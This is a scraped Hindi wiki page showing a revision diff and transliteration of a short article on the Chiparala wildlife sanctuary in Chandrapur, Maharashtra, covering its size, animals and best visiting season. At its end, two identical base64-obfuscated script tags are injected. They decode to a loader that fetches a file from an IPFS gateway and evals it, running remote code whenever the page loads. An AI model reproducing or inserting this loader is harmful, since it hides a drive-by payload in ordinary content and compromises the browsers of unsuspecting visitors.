Difference between revisions of "चिपराला वन्यजीव अभयारण्य चन्द्रपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "फरवरी" to "फ़रवरी")
 
(12 intermediate revisions by 6 users not shown)
Line 1: Line 1:
शुष्क वनों से घिरा यह अभ्यारण्य 134 वर्ग कि.मी. के क्षेत्र में फैला हुआ है। यह अभ्यारण्य मुख्यत: बड़ी गिलहरियों के लिए जाना जाता है। साथ ही अनेक दुर्लभ पशु जैसे टाईगर, तेंदुए, जंगली बिल्ली, स्लोथ बीयर, जंगली [[कुत्ता]] आदि भी यहाँ देखे जा सकते हैं। [[अजगर]] और [[गोह]] जैसे सरीसृप भी यहाँ दिखाई देते हैं। फ़रवरी से मई का समय यहाँ आने के लिए उपयुक्त माना जाता है।
+
*चिपराला वन्यजीव अभयारण्य [[महाराष्ट्र]] के [[चन्द्रपुर]] शहर में स्थित है।
 +
*शुष्क वनों से घिरा यह अभयारण्य 134 वर्ग कि.मी. के क्षेत्र में फैला हुआ है।  
 +
*यह अभयारण्य मुख्यत: बड़ी गिलहरियों के लिए जाना जाता है।  
 +
*[[अजगर]] और [[गोह]] जैसे सरीसृप भी यहाँ दिखाई देते हैं।
 +
*साथ ही अनेक दुर्लभ पशु जैसे [[बाघ]], [[तेंदुआ|तेंदुए]], जंगली बिल्ली, स्लोथ बीयर, जंगली कुत्ता आदि भी यहाँ देखे जा सकते हैं।  
 +
*[[फ़रवरी]] से [[मई]] का समय यहाँ आने के लिए उपयुक्त माना जाता है।
  
 +
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{महाराष्ट्र के पर्यटन स्थल}}
 
{{महाराष्ट्र के पर्यटन स्थल}}
 +
{{राष्ट्रीय उद्यान और अभयारण्य}}
 +
 +
[[Category:महाराष्ट्र]]
 
[[Category:महाराष्ट्र के पर्यटन स्थल]]
 
[[Category:महाराष्ट्र के पर्यटन स्थल]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 +
[[Category:राष्ट्रीय उद्यान और अभयारण्य]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:18, 26 July 2011

  • chiparala vanyajiv abhayarany maharashtr ke chandrapur shahar mean sthit hai.
  • shushk vanoan se ghira yah abhayarany 134 varg ki.mi. ke kshetr mean phaila hua hai.
  • yah abhayarany mukhyat: b di gilahariyoan ke lie jana jata hai.
  • ajagar aur goh jaise sarisrip bhi yahaan dikhaee dete haian.
  • sath hi anek durlabh pashu jaise bagh, teandue, jangali billi, sloth biyar, jangali kutta adi bhi yahaan dekhe ja sakate haian.
  • faravari se mee ka samay yahaan ane ke lie upayukt mana jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>